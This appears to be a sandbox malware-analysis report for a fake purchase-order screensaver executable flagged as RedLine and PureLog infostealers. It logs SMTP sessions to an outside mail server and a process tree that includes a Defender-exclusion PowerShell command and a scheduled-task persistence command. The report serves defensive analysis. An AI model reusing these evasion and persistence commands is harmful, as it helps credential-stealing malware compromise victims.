                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.792007923 CEST49712587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.972194910 CEST5874971251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.014480114 CEST5874972251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:07:31 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.019426107 CEST49722587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.202223063 CEST5874972251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.211447954 CEST49722587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:32.396934986 CEST5874972251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.762428999 CEST5875159051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:09:08 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.762562990 CEST51590587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.944554090 CEST5875159051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.944741011 CEST51590587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.127430916 CEST5875159051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.688433886 CEST5875163951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:09:22 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.691416979 CEST51639587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.873665094 CEST5875163951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                                                                                                                          250-PIPECONNECT
                                                                                                                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                                                                                                                          250 HELP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.877556086 CEST51639587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.060930967 CEST5875163951.195.88.199192.168.2.5220 TLS go ahead

                                                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                                          Start time:04:07:14
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:6'536'429 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:2940B15A52C0AAA97DB24E4043FFFFCF
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                                          Start time:04:07:16
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x50000
                                                                                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                                          Start time:04:07:16
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:6'536'429 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:2940B15A52C0AAA97DB24E4043FFFFCF
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                                          Start time:04:07:19
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x50000
                                                                                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                                          Start time:04:07:20
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\microsofts.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                                          Start time:04:07:21
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x10000
                                                                                                                                                                                                                                                                                                          File size:587'776 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                                                          Start time:04:07:21
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:3B6501FEEF6196F24163313A9F27DBFD
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                                          Start time:04:07:22
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                                          Start time:04:07:22
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:882AAAB29114AA61C89B0726B6FA58A4
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                          Imagebase:0xbe0000
                                                                                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                          Imagebase:0x540000
                                                                                                                                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x7d0000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:timeout 6
                                                                                                                                                                                                                                                                                                          Imagebase:0x350000
                                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                                                          Start time:04:07:26
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0xd50000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                                                          Start time:04:07:27
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                                                                          File size:138'056 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                                                          Start time:04:07:27
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                                                                          File size:174'408 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                                          Start time:04:07:27
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                          Commandline:
                                                                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                                                                          File size:154'952 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                                                          Start time:04:07:27
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:5308671F56D4A4A4CDF6FF841AEF1780
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
